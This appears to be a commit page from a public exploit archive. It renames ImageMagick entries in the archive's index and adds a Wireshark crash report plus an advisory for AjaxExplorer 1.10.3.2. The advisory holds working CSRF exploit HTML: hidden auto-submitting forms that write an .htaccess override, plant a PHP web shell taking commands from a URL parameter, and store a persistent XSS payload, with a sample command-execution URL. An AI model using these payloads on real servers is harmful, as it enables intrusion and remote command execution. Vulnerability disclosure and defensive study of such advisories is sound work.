DB: 2016-06-02
2 new exploits GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability ImageMagick < 6.9.3-9 - Multiple Vulnerabilities ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick Delegate Arbitrary Command Execution ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities Wireshark - erf_meta_read_tag SIGSEGV
This commit is contained in:
parent
8164665ff7
commit
3a855523ef
3 changed files with 208 additions and 5 deletions
12
files.csv
12
files.csv
|
@ -3599,7 +3599,7 @@ id,file,description,date,author,platform,type,port
|
|||
3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0
|
||||
3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability",2007-05-17,"Mehmet Ince",php,webapps,0
|
||||
3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0
|
||||
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
|
||||
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
|
||||
3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-05-17,"Alkomandoz Hacker",php,webapps,0
|
||||
3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability",2007-05-18,"Mehmet Ince",php,webapps,0
|
||||
3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability",2007-05-18,MurderSkillz,php,webapps,0
|
||||
|
@ -22657,7 +22657,7 @@ id,file,description,date,author,platform,type,port
|
|||
25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0
|
||||
25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (1)",2005-04-25,kf,linux,dos,0
|
||||
25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (2)",2005-04-25,kf,linux,remote,0
|
||||
25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
|
||||
25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
|
||||
25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting Vulnerability",2005-04-25,deluxe89,php,webapps,0
|
||||
25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-25,Dcrab,asp,webapps,0
|
||||
25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure Vulnerability",2005-04-25,Lostmon,asp,webapps,0
|
||||
|
@ -25433,7 +25433,7 @@ id,file,description,date,author,platform,type,port
|
|||
28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0
|
||||
28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0
|
||||
28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0
|
||||
28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
|
||||
28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
|
||||
28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0
|
||||
28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
|
||||
28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability",2006-08-13,"Yan Rong Ge",linux,dos,0
|
||||
|
@ -35960,7 +35960,7 @@ id,file,description,date,author,platform,type,port
|
|||
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
|
||||
39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0
|
||||
39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0
|
||||
39767,platforms/multiple/dos/39767.txt,"ImageMagick < 6.9.3-9 - Multiple Vulnerabilities",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
|
||||
39767,platforms/multiple/dos/39767.txt,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
|
||||
39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0
|
||||
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
|
||||
39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
|
||||
|
@ -35982,7 +35982,7 @@ id,file,description,date,author,platform,type,port
|
|||
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
|
||||
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
|
||||
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
|
||||
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
|
||||
39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
|
||||
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
|
||||
|
@ -36057,3 +36057,5 @@ id,file,description,date,author,platform,type,port
|
|||
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
|
||||
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
24
platforms/multiple/dos/39877.txt
Executable file
24
platforms/multiple/dos/39877.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=803
|
||||
|
||||
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
|
||||
|
||||
--- cut ---
|
||||
==28415==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000022d84 (pc 0x7f0e1b0002a2 bp 0x7ffde25a76f0 sp 0x7ffde25a7630 T0)
|
||||
#0 0x7f0e1b0002a1 in erf_meta_read_tag wireshark/wiretap/erf.c:1242:13
|
||||
#1 0x7f0e1afff0f0 in populate_summary_info wireshark/wiretap/erf.c:1851:27
|
||||
#2 0x7f0e1aff34d6 in erf_read wireshark/wiretap/erf.c:447:7
|
||||
#3 0x7f0e1b1a746b in wtap_read wireshark/wiretap/wtap.c:1245:7
|
||||
#4 0x528196 in load_cap_file wireshark/tshark.c:3478:12
|
||||
#5 0x51e67c in main wireshark/tshark.c:2192:13
|
||||
|
||||
AddressSanitizer can not provide additional info.
|
||||
SUMMARY: AddressSanitizer: SEGV wireshark/wiretap/erf.c:1242:13 in erf_meta_read_tag
|
||||
==28415==ABORTING
|
||||
--- cut ---
|
||||
|
||||
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12352. Attached are three files which trigger the crash.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39877.zip
|
||||
|
177
platforms/php/webapps/39876.txt
Executable file
177
platforms/php/webapps/39876.txt
Executable file
|
@ -0,0 +1,177 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
|
||||
|
||||
[+] ISR: apparitionsec
|
||||
|
||||
|
||||
Vendor:
|
||||
==========
|
||||
sourceforge.net
|
||||
smsid
|
||||
|
||||
download linx:
|
||||
sourceforge.net/projects/ajax-explorer/files/
|
||||
|
||||
|
||||
Product:
|
||||
=======================
|
||||
AjaxExplorer v1.10.3.2
|
||||
|
||||
Manage server files through simple windows like interface.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=======================
|
||||
Remote Command Execution
|
||||
CSRF
|
||||
Persistent XSS
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
AjaxExplorer has command terminal feature where you can move, copy, delete
|
||||
files etc... also lets a user save commands in a
|
||||
flat file named "terminal" under their user profile
|
||||
"/ae.user/owner/myprofile".
|
||||
|
||||
e.g.
|
||||
|
||||
copy [FILEPATH + FILENAME] [FILEPATH]
|
||||
create [FILEPATH + FILENAME]
|
||||
|
||||
Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
|
||||
application by first creating an .htaccess file with an
|
||||
"allow from all" directive to bypass access restrictions, next create
|
||||
arbitrary PHP files for remote command execution purposes.
|
||||
This exploit will require two consecutive HTTP requests, so we need to
|
||||
target an iframe to stay on same page until exploit is completed.
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
1) first POST request creates .htaccess file so we can bypass directory
|
||||
browsing restrictions.
|
||||
2) second POST writes our remote command execution file we will then access
|
||||
to execute commands on the victim system.
|
||||
|
||||
The below P:/ for "strPath" form value is for "Profile"
|
||||
|
||||
|
||||
<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
|
||||
|
||||
<form target="PWNED" id="htaccess" action="
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
|
||||
method="post">
|
||||
<input type="hidden" name="strPage" value="control/file/editor" >
|
||||
<input type="hidden" name="strPath" value="P:/" >
|
||||
<input type="hidden" name="strFile" value=".htaccess" >
|
||||
<input type="hidden" name="strText" value='allow from all' >
|
||||
<script>document.getElementById('htaccess').submit()</script>
|
||||
</form>
|
||||
|
||||
<form target="PWNED" id="RCE" action="
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
|
||||
method="post">
|
||||
<input type="hidden" name="strPage" value="control/file/editor" >
|
||||
<input type="hidden" name="strPath" value="P:/" >
|
||||
<input type="hidden" name="strFile" value="terminal.php" >
|
||||
<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
|
||||
<script>document.getElementById('RCE').submit()</script>
|
||||
</form>
|
||||
|
||||
Now we can access and run arbitrary cmds.
|
||||
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
|
||||
:\\Windows\\system32\\calc.exe
|
||||
|
||||
|
||||
/////////////////////////////////////////////////////
|
||||
|
||||
|
||||
Here is another way to RCE this application... first create PHP file then
|
||||
edit.
|
||||
|
||||
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
|
||||
|
||||
<form target="DOOM" id="CSRF2" method="post" action="
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
|
||||
<input type="hidden" name="strPage" value="control/file/editor" />
|
||||
<input type="hidden" name="strPath" value="D:/" />
|
||||
<input type="hidden" name="strFile" value="PWNED.php" />
|
||||
<input type="hidden" name="strText"
|
||||
value="<?php%20exec($_GET['cmd']);%20?>" />
|
||||
</form>
|
||||
|
||||
<form target="DOOM" id="CSRF1" method="post" action="
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
|
||||
<input type="hidden" name="strPage" value="control/file/create" />
|
||||
<input type="hidden" name="strPath" value="D:/" />
|
||||
<input type="hidden" name="strFile" value="D:/PWNED.php" />
|
||||
<script>
|
||||
document.getElementById('CSRF1').submit()
|
||||
document.getElementById('CSRF2').submit()
|
||||
</script>
|
||||
</form>
|
||||
|
||||
|
||||
////////////////////////
|
||||
|
||||
Persistent XSS:
|
||||
================
|
||||
|
||||
We can also write persistent XSS payload to the user profile "terminal"
|
||||
file.
|
||||
|
||||
<form id="XSS" method="post" action="
|
||||
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
|
||||
<input type="hidden" name="strPage" value="control/file/editor" />
|
||||
<input type="hidden" name="strPath" value="P:/" />
|
||||
<input type="hidden" name="strFile" value="terminal" />
|
||||
<input type="hidden" name="strText" value="<script>alert(666)</script>" />
|
||||
<script>document.getElementById('XSS').submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
===============================
|
||||
Vendor Notification: NA
|
||||
June 1, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
8.0 (High)
|
||||
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
Loading…
Add table
Reference in a new issue